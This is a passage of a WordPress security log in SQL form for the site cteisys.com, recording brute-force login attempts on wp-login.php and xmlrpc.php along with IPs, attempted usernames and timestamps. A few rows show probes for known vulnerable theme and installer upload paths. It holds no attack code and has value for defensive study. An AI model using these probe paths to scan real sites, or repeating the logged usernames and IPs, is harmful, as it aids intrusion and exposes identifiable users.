K','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.143.36',2680917796,'newd',0,1664843644.6151,7,'VhAfXE4Fg0jMJp3IlxD6zv92','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.198.121',3497117305,'newd',0,1664844482.5029,7,'1xE9PlqhDCUbO6iuSgjz3yGQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.114.72.18',796018706,'newd',0,1664845268.1696,7,'P02RTZKBW6MaG5weS9zugIUX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('75.119.135.205',1266124749,'newd',0,1664845294.6143,7,'V0UncCGsTAwFJ4LObdm8K5lj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.168.95',2388502623,'newd',0,1664845789.7175,152,'oXeJuK0RaSmIiENxHQP9wnsW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.124.125.235',2105310699,'newd',0,1664845789.7190,152,'VWHLeZXwzQuoR4MJD0dA89P7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('84.54.23.178',1412831154,'newd',0,1664845789.8823,152,'oi2HVhPebljUNSW57dZ9GKmy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.229.40',3488933160,'newd',0,1664845795.9533,152,'qwHxgukmMaviIO2RdQfPpDzX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.10.82',3496806994,'newd',0,1664845797.7179,152,'Uusfm8JdCpA4rczOVIweiETQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.53.96.165',1547002021,'newd',0,1664845820.2335,152,'nRGVPiSv5oXI8KA01zNjB2Hl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.215.12.182',2732002486,'newd',0,1664845820.6906,152,'zjS6KpyNgLFRUH7kr2ZWcxlh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.201.61.46',2328444206,'newd',0,1664845821.9334,152,'iP2s94KmEzRJjAy1Xu0th7vW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'nathaniel-lipka',0,1664846031.4546,51,'tzvlYjB6A1IpbKZsxWOLyhVm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.159.155.6',866097926,'newd',0,1664846091.3294,7,'aj4rJBU67ivIQwSs0kKxLoRT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('123.25.21.16',2065241360,'newd',0,1664846117.0204,7,'59YgWqpUCxf8IEkr1Hoh3ans','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.38.73.235',908478955,'newd',0,1664846910.6803,7,'9AOaF05jY3Zgx8qcvQGVdeDC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('75.119.135.205',1266124749,'newd',0,1664846935.1076,7,'Lqi9UGWJujedtY42xlmvESP5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.99.229.218',392422874,'newd',0,1664847748.2200,7,'En6BvjVblio9Z0gwdak3xpOL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.165.198.224',3164980960,'newd',0,1664847754.9971,7,'NK4LGOA0s23rgTcopvCE8MhI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.249.163.48',1543086896,'newd',0,1664848575.6278,7,'ez7nsQTVLJS9wYmGhHFU4cIE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.230.15.115',2649100147,'newd',0,1664848582.2978,7,'XYr4GMzq2wI0SEtWDo8FkNg9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.178.146.199',867340999,'newd',0,1664849211.4623,152,'3NBrZvj7WERasP82xflAFeh9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.161.131.84',262243156,'newd',0,1664849211.5919,152,'CBnTDseQqLR2FKwtSZWuNxpO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.136.232.254',3246975230,'newd',0,1664849219.9162,152,'e97IKmTjYhyi1sUGAXaBC2Sd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.142.55',2707525175,'newd',0,1664849230.4999,152,'TBd7JO2KgQ5huaiA3VvXP0Hb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.86.229.13',576120077,'newd',0,1664849238.7653,152,'Qxfm37uqZ8saWCTPoL1EDVMz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('164.52.208.110',2754924654,'newd',0,1664849239.7586,152,'UyZJtunqWh4LID7Xc83rw9SE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.180.186.240',2343877360,'newd',0,1664849246.5607,152,'GV0OBCMk6bnx3dqLSIWmrlTQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.38.20.161',3257275553,'',0,1664849332.0951,55,'iDCqM718oRJnxtSu9skjPT06','','19|0|0|0|cteisys.com/wp-content/themes/photocrati-theme-v4/admin/scripts/scripts-update.php',0,19,0),('68.183.71.174',1152862126,'newd',0,1664849402.4109,7,'U4S5LNwjlODhzaE2uBiPxIHo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('68.183.71.174',1152862126,'newd',0,1664849414.5883,7,'pSXury9DEcl6xIzgGsvn4FYN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.207.163',2487799715,'newd',0,1664850240.1638,7,'1MvrjGdq3wVEgLASClD6KH4B','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.97.205.210',392285650,'newd',0,1664850246.6695,7,'7VfPBc5Om0izbdqHxh8re3R4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.78.15.126',2018381694,'newd',0,1664851065.6102,7,'RVrv2PqnpzoTiwmJZEGKkXj8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.69.8.8',2672101384,'newd',0,1664851072.3916,7,'Fkc5LgIQzjGauKdOfpiJsVeN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('43.129.81.132',729895300,'newd',0,1664854505.5350,152,'fF3aQjdmRIsXLZxYJhkBW2qp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.136.232.254',3246975230,'newd',0,1664854506.1236,152,'QHOUi2sDdMqk8FVWASxcuw1o','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.168.95',2388502623,'newd',0,1664854509.7826,152,'6OERACQT0vJKqaWu4ZmNBpSH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.71.145',2650097553,'newd',0,1664854513.9237,152,'b5uW1hNf2kn9cqrPXLSvVCYF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.213.249.210',2731932114,'newd',0,1664854515.5010,152,'cC52m3bE1BsNLToA4VvpKzS7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.79.3',3496824579,'newd',0,1664854516.8337,152,'Eh9NzjlDtqrp65i21HoxBnfI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.242.115.115',804418419,'newd',0,1664854522.7025,152,'YpjHndBrEAMkVfvPNtbiJ6hX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.49.240',3328324080,'nathaniel-lipka',0,1664855626.8543,51,'i6pTJ40caWY5KIUSeOzV2hsE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.55.206',3515693006,'newd',0,1664855701.6164,7,'Wsq8TyZp0laeCnJ21vVEAz7I','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('92.53.96.243',1547002099,'',0,1664855802.7500,55,'taKMSXfiH7URm1uxdJ4VTlr9','','19|0|0|0|cteisys.com/style.php',0,19,0),('128.199.152.152',2160564376,'Admin',0,1664902480.2548,152,'BE9QWjgmwP6iMGLNVd8vpUtk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.4.84',3103917140,'test1',0,1664907318.1487,152,'wWbxrV5IHvo7XzpREiFBgMuQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('84.54.23.178',1412831154,'admin',0,1664907318.1484,152,'tnNDyRe5d1VFcoBxulOk4ATL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.152.152',2160564376,'admin',0,1664907327.2983,152,'COnGiAe5BYujt9s6qo3ayVKp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.129.81.132',729895300,'Admin',0,1664907329.3128,152,'rnlZiyRCTbMYv50BdXctf3u4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.201.61.46',2328444206,'root',0,1664907335.0597,152,'VXM7bRoT0OGKwaPJqHxFg4Wc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.132.211',858162387,'gco_admin',0,1664907336.2101,152,'76v0zJf3Dr58kxNyCAStsKYh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.161.119.55',94467895,'admin',0,1664907341.6920,152,'6tMehnbYfz0sQIEW4HVoTg1L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.3.40',1807549224,'newd',0,1664908164.4924,7,'zPagZ6kS4pL9nx3ONAt1HQeG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.116.156',3451483292,'newd',0,1664909095.9021,7,'TdHv0xNEgMPDOc6lnht8YV1s','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.37.194',3515688386,'newd',0,1664909404.4019,7,'tq60VYZFz4B5v8AxGJieKRPC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664909498.4827,7,'pDiUu0RXJr4nc12f3oBQeTa5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.6.13',3103917581,'admin',0,1664909839.6789,152,'K3x6WrylMbOohA5dsV8vznaS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.141.171.155',3113069467,'tester',0,1664909839.8889,152,'5mGOlxXtuEKUJq6aFyieZ8Rp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.49.246.91',1160902235,'admin',0,1664909840.7042,152,'4mucjJ8DPAypMde0TKs2txIB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.251.216.88',1761335384,'admin',0,1664909843.1422,152,'WoGmwgBIPvHeftXNanVFqxb0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.126.46',2733735470,'admin',0,1664909847.5204,152,'i61vxQhAtYzRXBDVnfcpd5jG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.68.11.239',860097519,'test',0,1664909849.4709,152,'rSG8ZEtXu0VdOCk2PDhmTB4L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.222.142.146',1138658962,'admin',0,1664909852.8770,152,'XoGK3P0NtEOJF4AW7ynLv1xC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.178.145.187',1152553403,'admin',0,1664909855.5541,152,'ifocXpugxdQkKA6jPZeh8NH1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.10.82',3496806994,'admin',0,1664909861.2215,152,'f3rx9jc1ZgGe2Dyt5S0AN4Kp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('65.52.67.200',1093944264,'Admin',0,1664909862.5959,152,'JYA4ywmSrQ1lo9VPMqkCxdBN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.122.42.249',2256153337,'Admin',0,1664909871.8840,152,'jHMTEf1elJC6xXh2nIZP3wqd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.116.162',3451483298,'nathaniel-lipka',0,1664910295.4589,51,'UeIJpohsNRMBF3zTrGvOKmu5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.195.237.203',3116625355,'Joyce',0,1664913368.9359,152,'Q3iUBTa0PEMtmoGOWLc2pd6e','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.251.216.88',1761335384,'admin',0,1664913879.9670,152,'fFZz4VHwbBqcYXCIxpv9jP0K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.134.248.192',1535572160,'fitbodywrap',0,1664913880.0385,152,'465GFl9zAUKgSVCr7i1Z8MQo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.97.183.204',392280012,'blog',0,1664913880.0872,152,'qA0RPWC9Mt6Ns8OjUy5QGu41','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.4.84',3103917140,'ali',0,1664913887.3342,152,'Zu4cXYBO9afsjELFbWhqPArd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('78.47.46.81',1311714897,'Admin',0,1664913894.8533,152,'FoTmtJnUgHC2c1kirxwdyqZL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.122.42.249',2256153337,'Admin',0,1664913905.1598,152,'1nbRkMhPNA0j64x27wH5fpBc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.118.50.185',1953903289,'editor',0,1664913905.1760,152,'CkudXEzDRqcKIxSs3VvYHfNG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.122.42.249',2256153337,'admin',0,1664913911.7164,152,'hORJC56tZADWojidrpVal7MG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.3.40',1807549224,'newd',0,1664914670.0638,7,'sd1Fotn4EI5VQhxmcr0bfjiN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.156.175.35',3114053411,'Joyce',0,1664914913.9009,152,'v8MbsP4HBuoWlTcENqwC0jQe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.162.228.171',765650091,'Joyce',0,1664915594.3367,152,'Lhkp9QP2MdeaxCEYcvorUWDG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.102.28.107',1382423659,'joyce',0,1664916633.8012,152,'rzI2EJpfMPwjGS1c7Ra8lV9N','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.74.207.39',2303381287,'newd',0,1664919012.7229,152,'9XeIk5glihnS2qHsaZETQcOF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.170.41.170',2997496234,'newd',0,1664919012.7338,152,'jpns2GPocLNfXlOkq6zUFaC0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.13',3103917581,'newd',0,1664919012.7400,152,'WI9wlegDvBEV13ycjtu26Z5G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.207.63',2160578367,'newd',0,1664919017.9658,152,'0zyWPHOBCMDEVtpvfISluGk4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.128.143.157',1434488733,'newd',0,1664919022.7826,152,'RaMXUejfEqWAsPhQ2u9nS6NI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('90.156.169.206',1520216526,'newd',0,1664919025.7519,152,'maERCY6JkPsiHOLDMZ3duzvq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.113.222',3110826462,'newd',0,1664919026.5058,152,'qYbS0gVZ4Kyv2mzQXkinApaW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.118.50.185',1953903289,'newd',0,1664919027.2655,152,'cbQLjidUa92KVl1Yn5EF8gMr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.13',3103917581,'newd',0,1664919029.3629,152,'OHtlNJadMUpzn6X2x7uLhYc3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.27.156.245',3256589557,'newd',0,1664919034.7400,152,'TBnJAUXLjlyg13cNHrh5MvRs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.56.186.107',2453191275,'newd',0,1664919040.4705,152,'XpTuvAI3HKmWYO0cSRd8LiF5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.98.101.133',2372035973,'joyce',0,1664919433.7122,152,'aI7td8wgDH6fiYAspn3GPTlr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.206.225.51',3117343027,'joyce',0,1664920679.5247,152,'7kRFPInQrMSyDo3utwvABqmi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.30.89.67',3223214403,'Joyce',0,1664920844.6447,152,'ELaKNuHoFO0GXvBA5n6bkswZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664921572.1851,7,'F5pdmuaAlHGfEQ46SDTw8Ctz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.189.6.184',1807550136,'nathaniel-lipka',0,1664922081.3768,51,'pKuPDmUFjxQstSv2rol9LNWf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.189.176.172',1539158188,'newd',0,1664922529.0216,152,'0DgN7CnMsdxYtBr3Rqz1m6oE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.207.124.111',584023151,'newd',0,1664922531.9987,152,'MjBedtmNOouacw0s142FASTk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('84.34.147.63',1411552063,'newd',0,1664922532.1915,152,'JjnY9Sfu7hyvRGQCXD5pM4ow','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.210.145.8',3117584648,'newd',0,1664922533.9967,152,'JnUfQuA4r6KLRiNzbaYt8eDh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.136.249.235',881392107,'newd',0,1664922543.0444,152,'RqAexDpKahYH4vQNOn70ZCWt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.119.82.214',762794710,'newd',0,1664922545.9048,152,'M70wmv1OBeQnYGkiJAsdl8Nq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.242.115.115',804418419,'newd',0,1664922549.9162,152,'WeMcQiFkO1TmahXKEf6H8sB5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.235.52.36',1156264996,'joyce',0,1664922746.0842,152,'2CekrMtNWOVplFT1DKYZuQfL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.101',3583549797,'joyce',0,1664923007.1012,152,'d1wTyFpG9skELXCSmPjHVO7Z','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.79.3',3496824579,'newd',0,1664926175.3523,152,'HA2ESdgzZvWFrCi9NM8UnxRm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.220.174.115',3118247539,'newd',0,1664926175.3529,152,'vwYTVyjSleN7KxCc1XMJ6QHI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.198.134.153',2412152473,'newd',0,1664926175.3530,152,'Wrmydu5PLlxjzAbaCfnNTtIY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.242.115.115',804418419,'newd',0,1664926180.1480,152,'L2WnoD0XrJzgd1e6pfKSRMTt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.62.213.234',2990462442,'newd',0,1664926180.8340,152,'BXlaUDbuGHIQxiSmhW7OR0yz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.27.156.245',3256589557,'newd',0,1664926183.7149,152,'cyqEWM5bzPForBpA4fZ6SsHK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.222.142.146',1138658962,'newd',0,1664926195.6780,152,'geZD5HkuhzY0TEdfiNmWopy8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.161.119.55',94467895,'newd',0,1664926201.3133,152,'cQjDiSYA7Exm4vetRrUzynsL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'newd',0,1664929130.8655,7,'gHvcxCk7mqSPXnBpoWaN04ZO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.221.171',3091979691,'Joyce',0,1664929142.1637,152,'XetKWo5kAbi1Yr6DZL24mh83','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.187.195',3583556547,'joyce',0,1664929177.1777,152,'FRWhos37GElOrJnUaYXfqMck','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.205.42.229',734866149,'newd',0,1664929837.7091,152,'ftlMKhqrdYz78OSsBnuJcHiD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.141.216.42',59627562,'newd',0,1664929837.7104,152,'4DaQNwL0Pl1Ezc8ubVpFnqTS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.210.93.170',148004266,'newd',0,1664929839.1468,152,'j6ZTdB1erl3ckqWhJnLoVv0S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('108.170.27.202',1823087562,'newd',0,1664929842.6754,152,'lfn6Lur04qZykcwTBJYdxtA8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.210.145.8',3117584648,'newd',0,1664929844.7198,152,'AROTk5We14lgoiXa0YSfjNHI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.64.60.246',222313718,'newd',0,1664929845.3468,152,'SvhxQreNjuKJaRwV0t9E7yBd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.220.174.115',3118247539,'newd',0,1664929854.3142,152,'HZVTMCzyvglXoi4dFNkqSUWt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.153.64.181',2493071541,'newd',0,1664929858.0937,152,'8ICoyjVc3hKWErz72GdfeUMA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.66.145.163',2487390627,'newd',0,1664929859.2605,152,'lXsHbJkwp3mBnMue7LUAPxQa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.19.179.195',2249438147,'Joyce',0,1664932408.2991,152,'KJE8vb5RmkcY9or2jO37TGwI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.187.230',3583556582,'Joyce',0,1664933097.9422,152,'lyIoBWDibKHVRuan7FN9OvhS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.49.253',3515691517,'newd',0,1664933198.0001,7,'Uvp9L0k7tMQTPhH1zx8BRE3o','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.66.145.163',2487390627,'newd',0,1664934523.2737,152,'ejFBlmZaTq41s0WKCGkyRIDQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.27.156.245',3256589557,'newd',0,1664934528.8264,152,'6bDkHZwj3vF7GliENsB5Jayn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.88.95',1386567775,'newd',0,1664934534.5905,152,'zMd6RiYASs89h1ZU3qV5DPxC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.46.109.113',1496214897,'newd',0,1664934534.8348,152,'Hx8DKrm0EWpw3GIeuQcnXM2L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.132.211',858162387,'newd',0,1664934545.0083,152,'x76HbSckpGyiaODClevg0JoQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.61.188.225',759020769,'nathaniel-lipka',0,1664935892.1278,51,'7GCZ2KLI8WQjvi905JAHe1bx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.50.216',3328324312,'newd',0,1664936502.9418,7,'CzWKx4nkeLS6UuNqHQPmRypF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.169.54.203',346633931,'',0,1664936515.1574,55,'mgGd3awEnLBNu8cbXCSeFWUf','','19|0|0|0|cteisys.com/dup-installer/main.installer.php',0,19,0),('184.75.223.211',3091980243,'joyce',0,1664936727.6320,152,'evOPaIjr62xiVNzSXFs5Jyk3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.233.239.98',1357508450,'newd',0,1664937010.3155,152,'vpVgLHWeyOjrlTsudif5SYMG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.249.43.21',1475947285,'newd',0,1664937010.3155,152,'G2IhnF1DMe6WNqKmlbZT5Ox8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.249.230.12',3355043340,'joyce',0,1664937012.6487,152,'puxl9eVXoHWAChtjzJvS358Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.23.185.187',1998043579,'newd',0,1664937026.0065,152,'jM5oYQq7UVz62DftEi8KlF9A','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.71.48.115',3326554227,'Admin',0,1664937033.0086,152,'f0scIQuVwXGe6ibTdoJqxgZE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.153.64.181',2493071541,'larissa',0,1664937033.0130,152,'h1L7WwigmPEjIbneJdVXafUM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.129.81.132',729895300,'admin',0,1664937041.2798,152,'jghvtWLfl0Ex2DZICPaSKGr9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.161.131.84',262243156,'admin',0,1664937050.4138,152,'yj1c2sKV86tM4DYhQ7AiOWfp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.46.93.129',3324927361,'administrador',0,1664937051.8682,152,'D7fwiO49ZR0CN6WEuvFJSKLd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.206.225.51',3117343027,'Joyce',0,1664938335.1119,152,'St2UbXoxe9kA3rjuMqJwOBY8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.189.112.27',3116199963,'Joyce',0,1664938949.2879,152,'VD6n7vLc5NsybaiK9fB3teqE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.38.20.161',3257275553,'',0,1664939440.4839,55,'NyDdKxFq1kZBhTLP2gol4WXM','','19|0|0|0|cteisys.com/wp-content/themes/DailyDeal/monetize/upload/upload.php',0,19,0),('213.152.162.94',3583550046,'Joyce',0,1664940091.2913,152,'l7FEniyPXBAcobtguqNv28pT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.102.27.195',1382423491,'Joyce',0,1664940097.9876,152,'WFztQ9Xw5rGjhY6AJTyPIsdC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.203.66.97',1959477857,'admin',0,1664940567.4242,152,'z2PAZTirxkCNhfpwE3uon0Ha','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.49.240',3328324080,'newd',0,1664940606.6724,7,'1SDIWKwxYUioRzBVgdbst50H','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.60.194',2160540866,'admin',0,1664940837.9426,152,'mVuIFd3laJorpLDqXEC0NP8W','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.142.157.57',3113131321,'admin',0,1664940837.9668,152,'MhwL26HzAfbFVJpStdB8kjZs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.197.84.101',600134757,'suelen',0,1664940992.9185,152,'LroEcvCs0hnRb2KDGdS7tUPy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.136.249.235',881392107,'thanhtinhteam',0,1664940994.0830,152,'nuZYFMx4WGEHRkOrpjsNoU6B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.94.219.115',794745715,'admin',0,1664940999.0912,152,'AdwmOa0CBUnq7Y3L4KPlHSXs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.53.41',1364735273,'admin',0,1664941003.0640,152,'3RstmCOlIkPHBM2y7D1nu0z8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.211.78',2160579406,'admin',0,1664941009.1959,152,'Xhd3PwEroximyAfQztFlBMY8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.166',1364735142,'sac_tc212_sc1',0,1664941010.1149,152,'DPBy2ur0m4qghaX3MJtNY9e8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.210.145.8',3117584648,'admin',0,1664941010.6917,152,'roUwZC0bk1GdIVEtaBf8ONFv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.241.146',1807020434,'newd',0,1664941085.1638,152,'f8WKHokpQTilNaLIXvycGUtY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.37.175.140',774221708,'newd',0,1664941097.8256,152,'HsGmtSjaIfwYZ8n2v9MdqTol','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.19.15',860820239,'newd',0,1664941329.0434,152,'Sgzf0cmt7nF8BLE3TIiwPGeK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.199.81.163',3334951331,'newd',0,1664941338.9139,152,'gDacE8GzIb7XPthodq6rYsFx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.90.175',1701010095,'newd',0,1664941586.5232,152,'bmMrfjdO1gUsnIV7tAhGSi50','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.195.135.67',600016707,'newd',0,1664941607.6734,152,'0Q6u4DCoP27ThaWycAZtjf1b','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.214.169.69',1540794693,'joyce',0,1664941848.4470,152,'rQcy1V2u8kPzsmnEfGIZbaOC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'newd',0,1664942114.3437,152,'nDP2GcCzlo5TRdNxEqwe9LtZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.104.44.58',3110612026,'newd',0,1664942114.3517,152,'Dcf93v5HMp1r6GmSwunVqRzN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.249.29.54',2918784310,'newd',0,1664942333.7666,152,'8MlHeuTR70GCI4BsWdFfhQVw','','0|0|0|0|cteisys.